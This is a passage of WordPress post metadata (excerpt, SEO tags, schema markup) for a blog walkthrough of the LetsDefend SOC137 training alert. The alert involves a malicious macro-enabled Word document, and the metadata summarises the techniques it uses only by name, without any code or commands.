server hardening guides, and SOC analyst practice.<\/p>\n    <div class=\"author-links\">\n      <a class=\"author-link link-site\" href=\"https:\/\/securebydefault.io\">SecureByDefault.io<\/a>\n      <a class=\"author-link link-linkedin\" href=\"https:\/\/linkedin.com\/in\/ron-mercier\">LinkedIn<\/a>\n      <a class=\"author-link link-github\" href=\"https:\/\/github.com\/RonMercier\">GitHub<\/a>\n    <\/div>\n  <\/div>\n<\/div>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n","protected":false},"excerpt":{"rendered":"<p>A hands-on walkthrough of LetsDefend SOC137. Macro-enabled .docm file with obfuscated PowerShell, sandbox evasion, process injection, and MRU deletion. True Positive.<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"default","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","ast-disable-related-posts":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[38,86,37,105],"tags":[133,48,132,41,39,47,129,128,130,131,40,135,134],"class_list":["post-319","post","type-post","status-publish","format-standard","hentry","category-blue-team","category-career-development","category-incident-response","category-soc","tag-anti-forensics","tag-blue-team","tag-defense-evasion","tag-incident-response","tag-letsdefend","tag-malware-analysis","tag-obfuscation","tag-powershell","tag-process-injection","tag-sandbox-evasion","tag-soc-analyst","tag-t1055","tag-t1204"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v28.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>SOC137: Malicious File Download Attempt | LetsDefend Walkthrough<\/title>\n<meta name=\"description\" content=\"A hands-on walkthrough of LetsDefend SOC137. Macro-enabled .docm file with obfuscated PowerShell, sandbox evasion, process injection, and MRU deletion. True Positive.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/securebydefault.io\/blog\/soc137-malicious-file-script-download-attempt-letsdefend-walkthrough\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"SOC137: The invoice that was not an invoice\" \/>\n<meta property=\"og:description\" content=\"Investigated a macro-enabled Word doc on LetsDefend. Found obfuscated PowerShell, sandbox evasion, process injection into powershell.exe, and registry key deletion to cover tracks. Full walkthrough at SecureByDefault.io.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/securebydefault.io\/blog\/soc137-malicious-file-script-download-attempt-letsdefend-walkthrough\/\" \/>\n<meta property=\"og:site_name\" content=\"SecureByDefault\" \/>\n<meta property=\"article:published_time\" content=\"2026-09-05T21:38:15+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/securebydefault.io\/blog\/wp-content\/uploads\/2026\/08\/LDefend.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"720\" \/>\n\t<meta property=\"og:image:height\" content=\"376\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Ron Mercier\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Ron Mercier\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"9 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/securebydefault.io\\\/blog\\\/soc137-malicious-file-script-download-attempt-letsdefend-walkthrough\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/securebydefault.io\\\/blog\\\/soc137-malicious-file-script-download-attempt-letsdefend-walkthrough\\\/\"},\"author\":{\"name\":\"Ron Mercier\",\"@id\":\"https:\\\/\\\/securebydefault.io\\\/blog\\\/#\\\/schema\\\/person\\\/2ee989263a69e3324bce0cbed28ec0e8\"},\"headline\":\"SOC137 LetsDefend Walkthrough: Malicious File\\\/Script Download Attempt\",\"datePublished\":\"2026-09-05T21:38:15+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/securebydefault.io\\\/blog\\\/soc137-malicious-file-script-download-attempt-letsdefend-walkthrough\\\/\"},\"wordCount\":1622,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/securebydefault.io\\\/blog\\\/#\\\/schema\\\/person\\\/2ee989263a69e3324bce0cbed28ec0e8\"},\"image\":{\"@id\":\"https:\\\/\\\/securebydefault.io\\\/blog\\\/soc137-malicious-file-script-download-attempt-letsdefend-walkthrough\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/securebydefault.io\\\/blog\\\/wp-content\\\/uploads\\\/2026\\\/08\\\/LDefend.jpg\",\"keywords\":[\"Anti-Forensics\",\"blue team\",\"Defense Evasion\",\"incident response\",\"LetsDefend\",\"malware analysis\",\"Obfuscation\",\"PowerShell\",\"Process Injection\",\"Sandbox Evasion\",\"SOC analyst\",\"T1055\",\"T1204\"],\"articleSection\":[\"Blue Team\",\"Career Development\",\"Incident Response\",\"SOC\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/securebydefault.io\\\/blog\\\/soc137-malicious-file-script-download-attempt-letsdefend-walkthrough\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/securebydefault.io\\\/blog\\\/soc137-malicious-file-script-download-attempt-letsdefend-walkthrough\\\/\",\"url\":\"https:\\\/\\\/securebydefault.io\\\/blog\\\/soc137-malicious-file-script-download-attempt-letsdefend-walkthrough\\\/\",\"name\":\"SOC137: Malicious File Download Attempt | LetsDefend Walkthrough\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/securebydefault.io\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/securebydefault.io\\\/blog\\\/soc137-malicious-file-script-download-attempt-letsdefend-walkthrough\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/securebydefault.io\\\/blog\\\/soc137-malicious-file-script-download-attempt-letsdefend-walkthrough\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/securebydefault.io\\\/blog\\\/wp-content\\\/uploads\\\/2026\\\/08\\\/LDefend.jpg\",\"datePublished\":\"2026-09-05T21:38:15+00:00\",\"description\":\"A hands-on walkthrough of LetsDefend SOC137. Macro-enabled .docm file with obfuscated PowerShell, sandbox evasion, process injection, and MRU deletion. True Positive.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/securebydefault.io\\\/blog\\\/soc137-malicious-file-script-download-attempt-letsdefend-walkthrough\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/securebydefault.io\\\/blog\\\/soc137-malicious-file-script-download-attempt-letsdefend-walkthrough\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/securebydefault.io\\\/blog\\\/soc137-malicious-file-script-download-attempt-letsdefend-walkthrough\\\/#primaryimage\",\"url\":\"https:\\\/\\\/securebydefault.io\\\/blog\\\/wp-content\\\/uploads\\\/2026\\\/08\\\/LDefend.jpg\",\"contentUrl\":\"https:\\\/\\\/securebydefault.io\\\/blog\\\/wp-content\\\/uploads\\\/2026\\\/08\\\/LDefend.jpg\",\"width\":720,\"height\":376},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/securebydefault.io\\\/blog\\\/soc137-malicious-file-script-download-attempt-letsdefend-walkthrough\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/securebydefault.io\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"SOC137 LetsDefend Walkthrough: Malicious File\\\/Script Download Attempt\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/securebydefault.io\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/securebydefault.io\\\/blog\\\/\",\"name\":\"SecureByDefault\",\"description\":\"Cloud Security &amp; Cybersecurity for IT Professionals\",\"publisher\":{\"@id\":\"https:\\\/\\\/securebydefault.io\\\/blog\\\/#\\\/schema\\\/person\\\/2ee989263a69e3324bce0cbed28ec0e8\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/securebydefault.io\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https:\\\/\\\/securebydefault.io\\\/blog\\\/#\\\/schema\\\/person\\\/2ee989263a69e3324bce0cbed28ec0e8\",\"name\":\"Ron Mercier\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/securebydefault.io\\\/blog\\\/wp-content\\\/uploads\\\/2026\\\/05\\\/SecureByDefault_Log.png\",\"url\":\"https:\\\/\\\/securebydefault.io\\\/blog\\\/wp-content\\\/uploads\\\/2026\\\/05\\\/SecureByDefault_Log.png\",\"contentUrl\":\"https:\\\/\\\/securebydefault.io\\\/blog\\\/wp-content\\\/uploads\\\/2026\\\/05\\\/SecureByDefault_Log.png\",\"width\":512,\"height\":512,\"caption\":\"Ron Mercier\"},\"logo\":{\"@id\":\"https:\\\/\\\/securebydefault.io\\\/blog\\\/wp-content\\\/uploads\\\/2026\\\/05\\\/SecureByDefault_Log.png\"},\"sameAs\":[\"https:\\\/\\\/securebydefault.io\\\/blog\",\"https:\\\/\\\/www.linkedin.com\\\/in\\\/ron-mercier\\\/\",\"https:\\\/\\\/www.youtube.com\\\/channel\\\/UCDyWOTMI23S8Y3zwPoX3UkQ\"],\"url\":\"https:\\\/\\\/securebydefault.io\\\/blog\\\/author\\\/sbd_admin\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"SOC137: Malicious File Download Attempt | LetsDefend Walkthrough","description":"A hands-on walkthrough of LetsDefend SOC137. Macro-enabled .docm file with obfuscated PowerShell, sandbox evasion, process injection, and MRU deletion. True Positive.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/securebydefault.io\/blog\/soc137-malicious-file-script-download-attempt-letsdefend-walkthrough\/","og_locale":"en_US","og_type":"article","og_title":"SOC137: The invoice that was not an invoice","og_description":"Investigated a macro-enabled Word doc on LetsDefend. Found obfuscated PowerShell, sandbox evasion, process injection into powershell.exe, and registry key deletion to cover tracks. Full walkthrough at SecureByDefault.io.","og_url":"https:\/\/securebydefault.io\/blog\/soc137-malicious-file-script-download-attempt-letsdefend-walkthrough\/","og_site_name":"SecureByDefault","article_published_time":"2026-09-05T21:38:15+00:00","og_image":[{"width":720,"height":376,"url":"https:\/\/securebydefault.io\/blog\/wp-content\/uploads\/2026\/08\/LDefend.jpg","type":"image\/jpeg"}],"author":"Ron Mercier","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Ron Mercier","Est. reading time":"9 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/securebydefault.io\/blog\/soc137-malicious-file-script-download-attempt-letsdefend-walkthrough\/#article","isPartOf":{"@id":"https:\/\/securebydefault.io\/blog\/soc137-malicious-file-script-download-attempt-letsdefend-walkthrough\/"},"author":{"name":"Ron Mercier","@id":"https:\/\/securebydefault.io\/blog\/#\/schema\/person\/2ee989263a69e3324bce0cbed28ec0e8"},"headline":"SOC137 LetsDefend Walkthrough: Malicious File\/Script Download Attempt","datePublished":"2026-09-05T21:38:15+00:00","mainEntityOfPage":{"@id":"https:\/\/securebydefault.io\/blog\/soc137-malicious-file-script-download-attempt-letsdefend-walkthrough\/"},"wordCount":1622,"commentCount":0,"publisher":{"@id":"https:\/\/securebydefault.io\/blog\/#\/schema\/person\/2ee989263a69e3324bce0cbed28ec0e8"},"image":{"@id":"https:\/\/securebydefault.io\/blog\/soc137-malicious-file-script-download-attempt-letsdefend-walkthrough\/#primaryimage"},"thumbnailUrl":"https:\/\/securebydefault.io\/blog\/wp-content\/uploads\/2026\/08\/LDefend.jpg","keywords":["Anti-Forensics","blue team","Defense Evasion","incident response","LetsDefend","malware analysis","Obfuscation","PowerShell","Process Injection","Sandbox Evasion","SOC analyst","T1055","T1204"],"articleSection":["Blue Team","Career Development","Incident Response","SOC"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/securebydefault.io\/blog\/soc137-malicious-file-script-download-attempt-letsdefend-walkthrough\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/securebydefault.io\/blog\/soc137-malicious-file-script-download-attempt-letsdefend-walkthrough\/","url":"https:\/\/securebydefault.io\/blog\/soc137-malicious-file-script-download-attempt-letsdefend-walkthrough\/","name":"SOC137: Malicious File Download Attempt | LetsDefend Walkthrough","isPartOf":{"@id":"https:\/\/securebydefault.io\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/securebydefault.io\/blog\/soc137-malicious-file-script-download-attempt-letsdefend-walkthrough\/#primaryimage"},"image":{"@id":"https:\/\/securebydefault.io\/blog\/soc137-malicious-file-script-download-attempt-letsdefend-walkthrough\/#primaryimage"},"thumbnailUrl":"https:\/\/securebydefault.io\/blog\/wp-content\/uploads\/2026\/08\/LDefend.jpg","datePublished":"2026-09-05T21:38:15+00:00","description":"A hands-on walkthrough of LetsDefend SOC137. Macro-enabled .docm file with obfuscated PowerShell, sandbox evasion, process injection, and MRU deletion. True Positive.","breadcrumb":{"@id":"https:\/\/securebydefault.io\/blog\/soc137-malicious-file-script-download-attempt-letsdefend-walkthrough\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/securebydefault.io\/blog\/soc137-malicious-file-script-download-attempt-letsdefend-walkthrough\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/securebydefault.io\/blog\/soc137-malicious-file-script-download-attempt-letsdefend-walkthrough\/#primaryimage","url":"https:\/\/securebydefault.io\/blog\/wp-content\/uploads\/2026\/08\/LDefend.jpg","contentUrl":"https:\/\/securebydefault.io\/blog\/wp-content\/uploads\/2026\/08\/LDefend.jpg","width":720,"height":376},{"@type":"BreadcrumbList","@id":"https:\/\/securebydefault.io\/blog\/soc137-malicious-file-script-download-attempt-letsdefend-walkthrough\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/securebydefault.io\/blog\/"},{"@type":"ListItem","position":2,"name":"SOC137 LetsDefend Walkthrough: Malicious File\/Script Download Attempt"}]},{"@type":"WebSite","@id":"https:\/\/securebydefault.io\/blog\/#website","url":"https:\/\/securebydefault.io\/blog\/","name":"SecureByDefault","description":"Cloud Security &amp; Cybersecurity for IT Professionals","publisher":{"@id":"https:\/\/securebydefault.io\/blog\/#\/schema\/person\/2ee989263a69e3324bce0cbed28ec0e8"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/securebydefault.io\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":["Person","Organization"],"@id":"https:\/\/securebydefault.io\/blog\/#\/schema\/person\/2ee989263a69e3324bce0cbed28ec0e8","name":"Ron Mercier","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/securebydefault.io\/blog\/wp-content\/uploads\/2026\/05\/SecureByDefault_Log.png","url":"https:\/\/securebydefault.io\/blog\/wp-content\/uploads\/2026\/05\/SecureByDefault_Log.png","contentUrl":"https:\/\/securebydefault.io\/blog\/wp-content\/uploads\/2026\/05\/SecureByDefault_Log.png","width":512,"height":512,"caption":"Ron Mercier"},"logo":{"@id":"https:\/\/securebydefault.io\/blog\/wp-content\/uploads\/2026\/05\/SecureByDefault_Log.png"},"sameAs":["https:\/\/securebydefault.io\/blog","https:\/\/www.linkedin.com\/in\/ron-mercier\/","https:\/\/www.youtube.com\/channel\/UCDyWOTMI23S8Y3zwPoX3UkQ"],"url":"https:\/\/securebydefault.io\/blog\/author\/sbd_admin\/"}]}},"_links":{"self":[{"href":"https:\/\/securebydefault.io\/blog\/wp-json\/wp\/v2\/posts\/319","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/securebydefault.io\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/securebydefault.io\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/securebydefault.io\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/securebydefault.io\/blog\/wp-json\/wp\/v2\/comments?post=319"}],"version-history":[{"count":2,"href":"https:\/\/securebydefault.io\/blog\/wp-json\/wp\/v2\/posts\/319\/revisions"}],"predecessor-version":[{"id":331,"href":"https:\/\/securebydefault.io\/blog\/wp-json\/wp\/v2\/posts\/319\/revisions\/331"}],"wp:attachment":[{"href":"https:\/\/securebydefault.io\/blog\/wp-json\/wp\/v2\/media?parent=319"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/securebydefault.io\/blog\/wp-json\/wp\/v2\/categories?post=319"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/securebydefault.io\/blog\/wp-json\/wp\/v2\/tags?post=319"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}